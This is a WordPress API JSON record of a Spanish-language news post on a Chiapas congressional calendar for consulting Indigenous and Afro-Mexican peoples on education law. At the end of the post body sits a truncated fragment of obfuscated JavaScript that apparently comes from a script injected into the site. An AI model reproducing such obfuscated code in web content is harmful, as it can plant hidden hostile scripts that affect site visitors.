{"id":8287,"date":"2023-01-25T02:22:27","date_gmt":"2023-01-25T02:22:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8287"},"modified":"2023-01-25T02:22:27","modified_gmt":"2023-01-25T02:22:27","slug":"aprueban-calendario-para-realizar-foros-de-consulta-en-materia-de-educacion-indigena-y-afromexicana","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8287","title":{"rendered":"Aprueban calendario para realizar foros de consulta en materia de educaci\u00f3n indigena y afromexicana"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230123-WA0023-1024x682.jpg\" alt=\"\" class=\"wp-image-8288\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230123-WA0023-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230123-WA0023-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230123-WA0023-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230123-WA0023-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230123-WA0023.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 23 de enero de 2023.- Las Comisiones Unidas de Educaci\u00f3n y Cultura y de Pueblos y Comunidades Ind\u00edgenas que presiden la diputada Mar\u00eda Reyes Diego y Cuauhtemoc Manuel Hern\u00e1ndez G\u00f3mez, respectivamente, firmaron el acuerdo interno que aprueba el calendario de la Consulta a los Pueblos ind\u00edgenas y Afromexicanos en materia de Ley de Educaci\u00f3n.<\/p>\n\n\n\n<p>Lo anterior, sostiene el resolutivo, para que el Congreso del Estado est\u00e9 en condiciones de modificar el contenido del art\u00edculo primero del presente acuerdo, por el que se aprueba el calendario a fin de que se pueda ampliar el periodo de las consultas previamente acordado.<\/p>\n\n\n\n<p>Asimismo se aprob\u00f3 la convocatoria para la consulta a los pueblos y comunidades ind\u00edgenas y afromexicanos en materia de educaci\u00f3n ind\u00edgena relativas a la Ley de Educaci\u00f3n&nbsp;<\/p>\n\n\n\n<p>Las mesas de trabajo iniciar\u00edan en Tuxtla Guti\u00e9rrez, en el auditorio de Los Constituyentes el 13 de febrero y se har\u00edan en diferentes sedes del estado de Chiapas, culminando el 07 de marzo.<\/p>\n\n\n\n<p>Todo lo anterior, atendiendo en tiempo y forma, la acci\u00f3n de inconstitucionalidad 291\/2020, emitido por la Suprema Corte de Justicia de la Naci\u00f3n en la que declar\u00f3 la invalidez de los art\u00edculos del 70 al 74 de la Ley General de Educaci\u00f3n, en Chiapas, en materia de pueblos y comunidades ind\u00edgenas y Afromexicanas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas a 23 de enero de 2023.- Las Comisiones Unidas de Educaci\u00f3n y Cultura y de Pueblos y Comunidades Ind\u00edgenas que presiden la diputada Mar\u00eda Reyes Diego y Cuauhtemoc Manuel Hern\u00e1ndez G\u00f3mez, respectivamente, firmaron el acuerdo interno que aprueba el calendario de la Consulta a los Pueblos ind\u00edgenas y Afromexicanos en materia de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8288,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8287","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8287","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8287"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8287\/revisions"}],"predecessor-version":[{"id":8289,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8287\/revisions\/8289"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8288"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8287"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8287"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8287"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}